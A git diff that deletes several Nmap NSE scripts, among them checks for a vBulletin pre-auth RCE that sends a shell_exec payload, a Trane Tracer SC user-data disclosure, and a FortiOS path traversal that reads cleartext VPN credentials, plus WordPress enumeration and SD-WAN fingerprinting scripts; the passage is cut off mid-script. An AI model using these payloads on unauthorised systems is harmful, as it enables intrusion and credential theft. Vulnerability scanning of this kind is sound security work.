@@ -1,88 +0,0 @@ -description = [[ -vBulletin 5.x 0day pre-auth RCE exploit -This should work on all versions from 5.0.0 till 5.5.4 -INSTALLATION -$ git clone https://github.com/r00tpgp/http-vuln-CVE-2019-16759 -$ cd http-vuln-CVE-2019-16759/ -$ sudo cp http-vuln-CVE-2019-16759.nse /usr/share/nmap/scripts/ -$ sudo nmap --script http-vuln-CVE-2019-16759 -p 80 -sSV -]] - -local http = require "http" -local shortport = require "shortport" -local vulns = require "vulns" -local stdnse = require "stdnse" -local string = require "string" - ---- --- @usage --- nmap -p --script http-vuln-CVE-2019-16759 --- --- @output --- PORT STATE SERVICE --- s4430/tcp open http --- | http-vuln-CVE-2019-16759: --- | VULNERABLE --- | vBulletin 5.x 0day pre-auth RCE exploit --- | State: VULNERABLE --- | IDs: CVE:CVE-2019-16759 --- | --- | Disclosure date: 2019-09-23 --- | References: --- | https://seclists.org/fulldisclosure/2019/Sep/31 --- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759 --- --- @args http-vuln-cve2019-16759.path The default URL path to request. The default is "/". 
- -author = "r00tpgp" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = { "vuln" } - -portrule = shortport.http - -action = function(host, port) - local vuln = { - title = "vBulletin 5.x 0day pre-auth RCE exploit", - state = vulns.STATE.NOT_VULN, - description = [[ -vBulletin 5.x 0day pre-auth RCE exploit -This should work on all versions from 5.0.0 till 5.5.4 - ]], - IDS = { - CVE = "CVE-2019-16759" - }, - references = { - 'https://seclists.org/fulldisclosure/2019/Sep/31', - 'https://nvd.nist.gov/vuln/detail/CVE-2019-16759', - }, - dates = { - disclosure = { year = '2019', month = '09', day = '23' } - } - } - - local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) - - local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST" - local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php" - - local body = { - ["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;", - } - - local options = { - header = { - Connection = "close", - ["Content-Type"] = "application/x-www-form-urlencoded", - ["User-Agent"] = "curl/7.65.3", - ["Accept"] = "*/*", - }, - content = body -} - local response = http.post(host, port, path, nil, nil, body) - - if response and string.match(response.body, "h4x0000r") then - vuln.state = vulns.STATE.VULN - end - - return vuln_report:make_output(vuln) -end diff --git a/nmap_scripts/http-vuln-cve2016-0870.nse b/nmap_scripts/http-vuln-cve2016-0870.nse deleted file mode 100644 index c92d6e2..0000000 --- a/nmap_scripts/http-vuln-cve2016-0870.nse +++ /dev/null 
@@ -1,180 +0,0 @@ -local nmap = require "nmap" -local http = require "http" -local stdnse = require "stdnse" -local string = require "string" -local shortport = require "shortport" -local table = require "table" - -description = [[ -Trane Tracer SC is an intelligent field panel for communicating with HVAC equipment controllers. According to Trane U.S. Inc., Tracer SC is deployed across several sectors including Commercial Facilities and others. - -Contents of specific directories on the Tracer SC are exposed with the web server application to unauthenticated users. These directories have sensitive information within the configuration files. - -Valid on Trane Tracer SC version 4.20.1134 and below. Tested on 7/3/17. - -$ git clone https://github.com/hkm/nmap-nse-scripts.git - -References: -* https://ics-cert.us-cert.gov/advisories/ICSA-16-259-03 -* http://www.cvedetails.com/cve/CVE-2016-0870/ -* http://websec.mx - -]] - ---- --- @usage nmap -p80 --script http-vuln-cve2016-0870.nse --- --- @output --- | trane-info: --- | serverName: TracerSC --- | serverTime: 2017-07-03T21:01:02-04:00 --- | serverBootTime: 2017-06-25T03:14:38-04:00 --- | vendorName: Trane --- | productName: Tracer SC --- | productVersion: v4.40.1211 (release) --- | kernelVersion: 2.6.30_HwVer12AB-hydra --- | hardwareType: HwVer12AB --- | hardwareSerialNumber: E15A##### --- | 1:equipmentUri: /equipment/generic/generic/## --- | 1:displayName: BOILER ROOMS --- | 1:deviceName: BOILER ROOMS --- | 1:equipmentFamily: Generic --- | 1:roleDocument: BOILER_ROOMS --- | 1:isOffline: false --- | 2:equipmentUri: /equipment/generic/generic/## --- | 2:displayName: BOILER ROOMS --- | 2:deviceName: BOILER ROOMS --- | 2:equipmentFamily: Generic --- | 2:roleDocument: BOILER_ROOMS --- | 2:isOffline: false --- | 3:equipmentUri: /equipment/generic/generic/## --- | 3:displayName: EXHAUSTS 3 RM-6 --- | 3:deviceName: EXHAUSTS 3 RM-6 --- | 3:equipmentFamily: Generic --- | 3:roleDocument: EXHAUSTS_3_RM-6 --- | 3:isOffline: false 
--- --- @xmloutput --- TracerSC --- 2017-07-03T21:01:02-04:00 --- 2017-06-25T03:14:38-04:00 --- Trane --- Tracer SC --- v4.40.1211 (release) --- -- 2.6.30_HwVer12AB-hydra --- HwVer12AB --- E15A##### --- /equipment/generic/generic/## --- BOILER ROOMS --- BOILER ROOMS --- Generic --- BOILER_ROOMS --- false --- /equipment/generic/generic/## --- BOILER ROOMS --- BOILER ROOMS --- Generic --- BOILER_ROOMS --- false --- /equipment/generic/generic/## --- EXHAUSTS 3 RM-6 --- EXHAUSTS 3 RM-6 --- Generic --- EXHAUSTS_3_RM-6 --- false ---- - -author = "Pedro Joaquin " -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"vuln", "safe"} - -portrule = shortport.portnumber({80}) - -local output = stdnse.output_table() -local outputcol = "\nuserId, firstName, lastName, phoneNo, email, administrator, active,\n" - -local count = 1 - -local function GetUserInfo(host, port, usernumber) - --Get information from /evox/user/user/#usernumber# - local uri = '/evox/user/user/'..usernumber - local response = http.get(host, port, uri) - if response['status-line'] and response['status-line']:match("200") then - --Verify response and parsing of XML /evox/user/user/#usernumber# - local xmlparsetest = response['body']:match('userId') - if not xmlparsetest then - stdnse.debug1("Problem with XML parsing. No users found in /evox/user/user") - return nil, "Problem with XML parsing. 
No users found in /evox/user/user" - end - if response['status-line'] and response['status-line']:match("401") then - stdnse.debug1("401 Unauthorized") - return nil, "401 Unauthorized" - end - - local keylist = {"userId","firstName","lastName","phoneNo","email", "administrator","active"} - for _,key in ipairs(keylist) do - stdnse.debug1("Looking for : "..key) - output[count..":"..key] = response['body']:match(key..'" val=([^<]*) />') - output[count..":"..key] = string.gsub(output[count..":"..key],'"',"") - outputcol = outputcol..output[count..":"..key]..', ' - stdnse.debug1("Found : "..output[count..":"..key]) - end - count = count + 1 - outputcol = outputcol .. '\n' -end -end - -local function GetInformation(host, port) - - --Get information from /evox/user/user - local uri = '/evox/user/user' - local response = http.get(host, port, uri) - if response['status-line'] and response['status-line']:match("200") then - --Verify response and parsing of XML from /evox/user/user - local xmlparsetest = response['body']:match(' --- --- @output --- PORT STATE SERVICE REASON --- 10443/tcp open ssl/http Fortinet SSL VPN --- | CVE-2018-13379: --- | VULNERABLE: --- | FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure --- | State: VULNERABLE (Exploitable) --- | IDs: CVE-2018-13379 --- | Description: --- | Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow --- | an unauthenticated attacker to download FortiOS system files. --- | --- | FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script --- | will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). --- | This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). --- | --- | Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). 
--- | Disclosure date: 24-05-2019 --- | References: --- | https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf --- |_ https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html --- --- @xmloutput --- --- FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure --- VULNERABLE ---
--- FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). ---
--- ---
--- 05 --- 24 --- 2019 ---
--- --- 2019-05-24 --- --- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html --- https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf ---
--- ---- - -author = {"Asahel Hernandez (Blazz3) "} -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"vuln","safe"} - -portrule = shortport.http - -action = function(host, port) -local vuln = { - title = 'FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure', - state = vulns.STATE.NOT_VULN, -- default - description = [[ - Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow - an unauthenticated attacker to download FortiOS system files. - - FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script - will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). - This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). - - Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). - ]], - IDS = {CVE = 'CVE-2018-13379'}, - references = { - 'https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf', - 'https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html' - }, - dates = { - disclosure = {year = '2019', month = '05', day = '24'}, - }, -} -local report = vulns.Report:new(SCRIPT_NAME, host, port) -local path = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -local response = http.get(host, port, tostring(path)) -local body = response.body ---local fbody = body:gsub("%z", ".") ---stdnse.debug1("Body: %s", fbody) - -if response.status == 200 and http.response_contains(response, "var fgt_lang =") then - stdnse.debug1("Vulnerable!") - vuln.state = vulns.STATE.VULN - local extra_info = body:gsub("[^\x20-\x7E]", ".") - local extra_info2 = extra_info:gsub("%.+", "\n") - - local f = "" - local t = {} - for i in extra_info2:gmatch("%w+") do - t[#t + 1] = i - end - - for k,v in ipairs(t) do - if string.len(v) > 5 then - if not (string.match(v, "Soprema") 
and string.match(v, "WebSSLSoprema")) then - f = f..v.."\n" - end - end - end - vuln.extra_info = "Snippet from configuration file:\n"..f -else - vuln.state = vulns.STATE.NOT_VULN - stdnse.debug1("Not Vulnerable...") -end - -return report:make_output(vuln) -end \ No newline at end of file diff --git a/nmap_scripts/http-wordpress-attachment.nse b/nmap_scripts/http-wordpress-attachment.nse deleted file mode 100644 index 08deba7..0000000 --- a/nmap_scripts/http-wordpress-attachment.nse +++ /dev/null 
@@ -1,141 +0,0 @@ -local http = require "http" -local io = require "io" -local nmap = require "nmap" -local shortport = require "shortport" -local stdnse = require "stdnse" -local string = require "string" - -description = [[ -Enumerates URLs of uploaded media and pages in Wordpress blog/CMS installations by exploiting an information disclosure vulnerability. - -$ git clone https://github.com/hkm/nmap-nse-scripts.git - -Original advisory: -* http://blog.whitehatsec.com/information-leakage-in-wordpress/#.Ueig9m0_yms -]] - ---- --- @usage --- nmap -p80 --script http-wordpress-attachment --- nmap -sV --script http-wordpress-attachment --script-args limit=1000 --- --- @output --- PORT STATE SERVICE --- 80/tcp open http --- | http-wordpress-attachment: --- | URL: http://www.hakim.ws/calendario/ --- | URL: http://www.hakim.ws/2010/12/noticias-anteriores-al-201/ --- |_Search stopped at ID #25. Increase the upper limit if necessary with '--script-args limit=1000' --- --- @args http-wordpress-attachment.limit Upper limit for ID search. Default: 100 --- @args http-wordpress-attachment.basepath Base path to Wordpress. Default: / --- @args http-wordpress-attachment.out If set it saves the URL list in this file. 
---- - -author = "Pedro Joaquin based on Paulino Calderon http-wordpress-enum" -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" -categories = {"auth", "intrusive", "vuln"} - - -portrule = shortport.http - ---- --- Returns the URL extracted from the Location corresponding to the attachment_id passed --- If attachment_id doesn't exists returns false --- @param host Host table --- @param port Port table --- @param path Base path to WP --- @param id Attachment id --- @return false if not found otherwise it returns the username ---- -local function get_wp_url(host, port, path, id) - stdnse.print_debug(2, "%s: Trying to get URL with attachment_id %s", SCRIPT_NAME, id) - local req = http.get(host, port, path.."?attachment_id="..id, {no_cache = true, redirect_ok = false}) - if req.status == 301 then - if string.find(req.header.location, "attachment_id") == nil then - stdnse.print_debug(1, "Attachment_id #%s returned %s", id, req.header.location) - return req.header.location - end - end - return false -end - ---- ---Returns true if WP installation exists. ---We assume an installation exists if wp-content is found in body of index.php ---@param host Host table ---@param port Port table ---@param path Path to WP ---@return True if 404 page contains string wp-content --- -local function check_wp(host, port, path) - stdnse.print_debug(2, "Checking wp-content in body") - local req = http.get(host, port, path..math.random(1, 99999999), {no_cache = true}) - if req.status == 404 then - if string.find(tostring(req.body), "wp%-content") ~= nil then - stdnse.print_debug(1, "Wordpress installation detected. 
String wp-content found in 404 body") - return true - end - end - return false -end - ---- ---Writes string to file ---Taken from: hostmap.nse ---@param filename Target filename ---@param contents String to save ---@return true when successful -local function write_file(filename, contents) - local f, err = io.open(filename, "w") - if not f then - return f, err - end - f:write(contents) - f:close() - return true -end - - ---- ---MAIN ---- -action = function(host, port) - local basepath = stdnse.get_script_args("http-wordpress-attachment.basepath") or "/" - local limit = stdnse.get_script_args("http-wordpress-attachment.limit") or 100 - local filewrite = stdnse.get_script_args("http-wordpress-attachment.out") - local output = {""} - local users = {} - - --First, we check this is WP - if not(check_wp(host, port, basepath)) then - if nmap.verbosity() >= 2 then - return "[Error] Wordpress installation was not found. We couldn't find wp-content" - else - return - end - end - - --Incrementing ids to enum URLs - for i=1, tonumber(limit) do - local user = get_wp_url(host, port, basepath, i) - if user then - output[#output+1] = string.format("URL: %s", user) - users[#users+1] = user - end - end - - if filewrite and #users>0 then - local status, err = write_file(filewrite, stdnse.strjoin("\n", users)) - if status then - output[#output+1] = string.format("URLs saved to %s\n", filewrite) - else - output[#output+1] = string.format("Error saving %s: %s\n", filewrite, err) - end - end - - if #output > 1 then - output[#output+1] = string.format("Search stopped at ID #%s. Increase the upper limit if necessary with 'http-wordpress-attachment.limit'", limit) - return stdnse.strjoin("\n", output) - end -end diff --git a/nmap_scripts/httpframe.nse b/nmap_scripts/httpframe.nse deleted file mode 100644 index e02f3f4..0000000 --- a/nmap_scripts/httpframe.nse +++ /dev/null 
@@ -1,115 +0,0 @@ -local http = require "http" -local shortport = require "shortport" -local stdnse = require "stdnse" -local string = require "string" - -description = [[ -Stores the results of an HTTP(S) scan on a HTML page with JQuery. Shows IP, header, -realm and tries to identify if target is a router, camera or common web server. - -Almacena los resultados de un barrido HTTP(S) en una página web con Frames y JQuery. -Muestra las direcciones IP, un mirror del contenido html, el contenido de la cabecera -www-authenticate. De acuerdo al header server o al contenido de la página que obtiene -muestra si es un router, cámara o firewall. - -$ git clone https://github.com/hkm/nmap-nse-scripts.git - -]] -author = {'Pedro Joaquin pjoaquin()websec.mx'} -license = "Same as Nmap--See http://nmap.org/book/man-legal.html" -categories = {"discovery"} - -portrule = shortport.port_or_service({80, 443}, - {"http", "https"}) - -local function categoria(server) - local modemlist = {'Router', 'Modem','RomPager', 'DSL', 'Mbedthis','Mathopd','GoAhead','IOS','httpd','siyou server','lighttpd','login.lp','ADTRAN','Technicolor','url_filter_hint.asp','RouterOS'} - for i=1, #modemlist do - if string.find(server, modemlist[i]) then return "Router" end - end - - local camlist = {'dcs-lig-httpd', 'Camera', 'Avtech', 'Hikvision', 'iCanWebServer', 'Boa', 'AV-TECH','Cross Web Server','DCS-','netcam'} - for i=1, #camlist do - if string.find(server, camlist[i]) then return "Camera" end - end - - local serverlist = {'Apache', 'IIS'} - for i=1, #serverlist do - if string.find(server, serverlist[i]) then return "Server" end - end - - return "Unknown" -end - -local function siexiste(var1) - if var1 == nil then - return "" - else - return var1 - end -end - -local function savefile(name, content, mode) - local file, err = io.open(name, mode) - if ( file ) then - file:write(content) - file:close() - else - return "\n ERROR: " .. 
file - end -end - -savefile('httpframe_log.html', 'httpframe.nse v0.5', 'w') -savefile("httpframe_log/menu.htm", '','w') - -savefile("httpframe_log/menu.htm", ''.. - ''.. - ''.. - ''.. - '', 'a+') - -savefile("httpframe_log/menu.htm", '','a+') - -action = function(host, port) - - local query = http.get(host.ip, port, "/") - - local serverstring = " " - - if query.header['server'] ~= nil then serverstring = query.header['server'] end - if query.header['www-authenticate'] ~= nil then serverstring = serverstring .. query.header['www-authenticate'] end - if query.body ~= nil then savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w') end - - if query.status == 302 then - serverstring = serverstring .. query.header['location'] - savefile("httpframe_log/" .. host.ip .. ".html", "Location: "..query.header['location'], 'w') - end - -if query.body ~= nil then - if string.find(query.body, ".location") then - serverstring=serverstring..query.body - query.body="" - savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w') - end -end - -if port.service == "https" then - savefile("httpframe_log/menu.htm", '', 'a+') -else - savefile("httpframe_log/menu.htm", '', 'a+') -end - - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - savefile("httpframe_log/menu.htm", '', 'a+') - - return "Information added to httpframe_log.html " -end diff --git a/nmap_scripts/infiltrator.nse b/nmap_scripts/infiltrator.nse deleted file mode 100644 index 5bab27f..0000000 --- a/nmap_scripts/infiltrator.nse +++ /dev/null 
@@ -1,1225 +0,0 @@ -local comm = require "comm" -local string = require "string" -local table = require "table" -local shortport = require "shortport" -local nmap = require "nmap" -local stdnse = require "stdnse" -local U = require "lpeg-utility" -local http = require "http" -local snmp = require "snmp" -local sslcert = require "sslcert" -local tls = require "tls" -local url = require "url" -local json = require "json" - -description = [[ -Search SD-WAN products from SDWAN NewHope research project database by -- server name -- http titles -- snmp descriptions -- ssl certificates - -The search database is based on census.md document with SD-WAN products search queries. -Also this script is based on: -- http-server-header NSE script by Daniel Miller -- http-title NSE script by Diman Todorov -- snmp-sysdescr NSE script by Thomas Buchanan -- ssl-cert NSE script by David Fifield - -Installation -$ git clone https://github.com/sdnewhop/sdwan-infiltrator -$ cd /sdwan-infiltrator/ -$ sudo cp * /usr/share/nmap/scripts/ -$ sudo nmap --script infiltrator --script-args infiltrator.version=true -sS -sU -p U:161,T:80,443,8008,8080,8443 or -iL -]] - - --- --- @usage --- nmap --script=infiltrator.nse -sS -sU -p U:161,T:80,443,8008,8080,8443 or -iL --- --- @output --- | infiltrator: --- | status: success --- | method: server --- | product: --- | host_addr: ... --- | host_port: 443 --- |_ version: ... --- ... --- | infiltrator: --- | status: success --- | method: title --- | product: --- | host_addr: ... --- | host_port: 443 --- |_ version: ... --- ... --- | infiltrator: --- | status: success --- | method: snmp --- | product: --- | host_addr: ... --- | host_port: 161 --- |_ version: ... --- ... --- | infiltrator: --- | status: success --- | method: SSL certificate --- | product: --- | host_addr: ... --- | host_port: 443 --- |_ version: ... 
- - -author = "sdnewhop" -license = "Same as Nmap--See https://nmap.org/book/man-legal.html" -categories = {"default", "discovery", "safe"} - - -portrule = shortport.portnumber({80, 161, 443, 8008, 8080, 8443}, {"tcp", "udp"}, {"open"}) - -SDWANS_BY_SSL_TABLE = { - ["Cisco SD-WAN"] = {"Viptela Inc"}, - ["Versa Analytics"] = {"versa%-analytics"}, - ["Versa Director"] = {"director%-1", "versa%-director"}, - ["Riverbed SteelHead"] = {"Riverbed Technology"}, - ["Silver Peak Unity Orchestrator"] = {"Silverpeak GMS"}, - ["Silver Peak Unity EdgeConnect"] = {"silver%-peak", "Silver Peak Systems Inc"}, - ["CloudGenix SD-WAN"] = {"CloudGenix Inc."}, - ["Talari SD-WAN"] = {"Talari", "Talari Networks"}, - ["InfoVista SALSA"] = {"SALSA Portal"}, - ["Barracuda CloudGen Firewall"] = {"Barracuda CloudGen Firewall", "Barracuda Networks"}, - ["Viprinet Virtual VPN Hub"] = {"Viprinet"}, - ["Citrix Netscaler SD-WAN"] = {"Citrix Systems"}, - ["Fortinet FortiGate SD-WAN"] = {"FGT%-", "FortiGate"} -} - -SDWANS_BY_SNMP_TABLE = { - ["Fatpipe SYMPHONY SD-WAN"] = {"Linux Fatpipe"}, - ["Versa Analytics"] = {"Linux versa%-analytics"}, - ["Juniper Networks Contrail SD-WAN"] = {"Juniper Networks, Inc. 
srx"}, - ["Aryaka Network Access Point"] = {"Aryaka Networks Access Point"}, - ["Arista Networks EOS"] = {"Arista Networks EOS"}, - ["Viprinet Virtual VPN Hub"]= {"Viprinet VPN Router"} -} - -SDWANS_BY_TITLE_TABLE = { - ["VMWare NSX SD-WAN"] = {"VeloCloud", "VeloCloud Orchestrator"}, - ["TELoIP VINO SD-WAN"] = {"Teloip Orchestrator API"}, - ["Fatpipe SYMPHONY SD-WAN"] = {"WARP"}, - ["Cisco SD-WAN"] = {"Viptela vManage", "Cisco vManage"}, - ["Versa Flex VNF"] = {"Flex VNF"}, - ["Versa Director"] = {"Versa Director Login"}, - ["Riverbed SteelConnect"] = {"SteelConnect Manager", "Riverbed AWS Appliance"}, - ["Riverbed SteelHead"] = {"amnesiac Sign in"}, - ["Citrix NetScaler SD-WAN VPX"] = {"Citrix NetScaler SD%-WAN %- Login"}, - ["Citrix NetScaler SD-WAN Center"] = {"SD%-WAN Center | Login"}, - ["Citrix Netscaler SD-WAN"] = {"DC | Login"}, - ["Silver Peak Unity Orchestrator"] = {"Welcome to Unity Orchestrator"}, - ["Silver Peak Unity EdgeConnect"] = {"Silver Peak Appliance Management Console"}, - ["Ecessa WANworX SD-WAN"] = {"Ecessa"}, - ["Nuage Networks SD-WAN (VNS)"] = {"SD%-WAN Portal", "Architect", "VNS portal"}, - ["Juniper Networks Contrail SD-WAN"] = {"Log In %- Juniper Networks Web Management"}, - ["Talari SD-WAN"] = {"AWS"}, - ["Aryaka Network Access Point"] = {"Aryaka Networks", "Aryaka, Welcome"}, - ["InfoVista SALSA"] = {"SALSA Login"}, - ["Huawei SD-WAN"] = {"Agile Controller"}, - ["Sonus SBC Management Application"] = {"SBC Management Application"}, - ["Sonus SBC Edge"] = {"Sonus SBC Edge Web Interface"}, - ["Arista Networks EOS"] = {"Arista Networks EOS"}, - ["128 Technology Networking Platform"] = {"128T Networking Platform"}, - ["Gluware Control"] = {"Gluware Control"}, - ["Barracuda CloudGen Firewall"] = {"Barracuda CloudGen Firewall"}, - ["Viprinet Virtual VPN Hub"] = {"Viprinet %- AdminDesk %- Login"}, - ["Viprinet Traffic Tools"] = {"Viprinet traffic tools"}, - ["Cradlepoint SD-WAN"] = {"Login :: CR4250%-PoE", "Login :: AER2200%-600M"}, - 
["Brain4Net Orchestrator"] = {"B4N ORC"}, - ["Fortinet FortiManager"] = {"FortiManager%-VM64"} - } - -SDWANS_BY_SERVER_TABLE = { - ["Versa Director"] = {"Versa Director"}, - ["Versa Analytics"] = {"Versa%-Analytics%-Server"}, - ["Barracuda CloudGen Firewall"] = {"Barracuda CloudGen Firewall"}, - ["Viprinet Virtual VPN Hub"] = {"ViprinetHubReplacement", "Viprinet"} - } - -------------------------------------------------------------------------------- --- version gathering block -------------------------------------------------------------------------------- - -local function vbrain(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/api/version" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - - found, matches = http.response_contains(response, '0;url%=(.*)"%/%>') - - if found == true then - local urltmp = url.parse(matches[1]) - urlp = urltmp.path - response = http.generic_request(host, port, "GET", urlp) - try_counter = 1 - end - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, '"build":"(.+)",', false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Brain4Net Orchestrator Version: " .. 
vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) -end - -local function vcradlepoint(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/login/?referer=/admin/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - found, matches = http.response_contains(response, "([0-9.]+[0-9]) .[a-zA-Z]+.[a-zA-Z]+.[0-9]+.[0-9]+:[0-9]+:[0-9]+", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Cradlepoint App Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) -end - -local function vcitrix(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - response = http.generic_request(host, port, "GET", path) - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - -- stdnse.print_debug("Status code: " .. 
response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - while try_counter < 30 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - found, matches = http.response_contains(response, "css%?v%=([.0-9]+)", false) - if found == true then vsdwan = matches[1] else return nil end - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Citrix NetScaler Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vfatpipe(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, "
([r.0-9]+)
", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Fatpipe Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vnuage(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, 'ng%-version="([.0-9]+)"', false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Nuage Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vriverbed(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. 
response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, "web3 v([.0-9]+)", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Riverbed Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vsilverpeak(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - if response.status == 302 then - - found, matches = http.response_contains(response, "http.*/([.0-9]+)/", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "SilverPeak Version: " .. 
